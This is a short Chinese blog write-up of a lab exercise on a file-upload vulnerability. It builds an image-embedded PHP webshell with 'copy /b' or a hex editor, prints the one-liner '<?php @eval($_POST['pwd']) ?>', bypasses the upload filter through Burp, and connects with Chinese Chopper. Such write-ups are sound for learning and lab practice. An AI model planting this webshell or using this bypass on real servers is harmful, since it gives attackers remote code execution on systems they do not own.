美文网首页
WebShell文件上传漏洞分析溯源(第3题)

WebShell文件上传漏洞分析溯源(第3题)

作者: seeiy | 来源:发表于2018-10-23 19:47 被阅读73次

    0x00
    工具:burpsuite、010editor、cmd

    0x01
    尝试上传PHP文件,提示无法上传。尝试写一个PHP文件的一句话木马,写完以后将文件后缀修改为图片的形式,前端绕过以后再burpsuite抓包修改回来文件的后缀为PHP形式,发现依然提示无法上传此类型的文件,心里猜测前端是通过文件类型不同的特征码来识别文件类型,而不是凭借文件后缀来过滤文件类型,故采用图片的形式来构造一句话木马。这里构造图片一句话木马有两种方法,一种是用cmd的copy命令,还有一种是采用工具,那种专门查看文件二进制或者hex值的工具,这种工具有很多,这里推荐使用010editor和winhex。

    0x02
    cmd构造一句话木马:

    copy 1.jpg/b+2.php 3.jpg
    
    QQ截图20181023194046.png

    这里主要注意就是在准备的图片和PHP木马的文件路径下打开cmd就行了,否则会报错说找不到文件。

    010editor构造:
    将随便的一种图片拖到工具里打开,然后在最后添加一句话木马就OK

    <?php @eval($_POST['pwd']) ?>
    
    QQ截图20181023192829.png

    0x03
    前期工作已经准备好了,接着就是上手了。
    第一步:先打开burpsuite,然后将我们准备的图片木马上传。修改文件后缀。


    QQ截图20181023192652.png

    显示上传成功


    QQ截图20181023192703.png

    第二步:菜刀连接


    QQ截图20181023192721.png QQ截图20181023192730.png QQ截图20181023192753.png

    完成!!!!!!!

    相关文章

      网友评论

          本文标题:WebShell文件上传漏洞分析溯源(第3题)

          本文链接:https://www.haomeiwen.com/subject/zpzazftx.html